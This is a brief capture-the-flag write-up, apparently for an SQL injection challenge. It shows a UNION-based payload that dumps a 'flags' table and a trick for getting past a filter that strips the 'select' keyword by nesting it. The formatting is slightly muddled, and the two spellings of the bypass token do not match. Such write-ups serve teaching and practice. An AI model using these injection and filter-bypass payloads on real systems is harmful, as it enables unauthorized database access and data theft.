This is SQL injection chall and we need to get the flag from the database, luckily the website showing us the query and the result on the website. For example I inputted `test/test` as the username and the password
Username: ' union select group_concat(flag, value),2,3 from flags-- -
Password:
```
Because there is a filter on the `select` keyword, we can bypass that filter by using `selselectect`. And then read the flag on `flags` table. This is the final payload.
```
' union sselectelect group_concat(flag, value),2,3 from flags-- -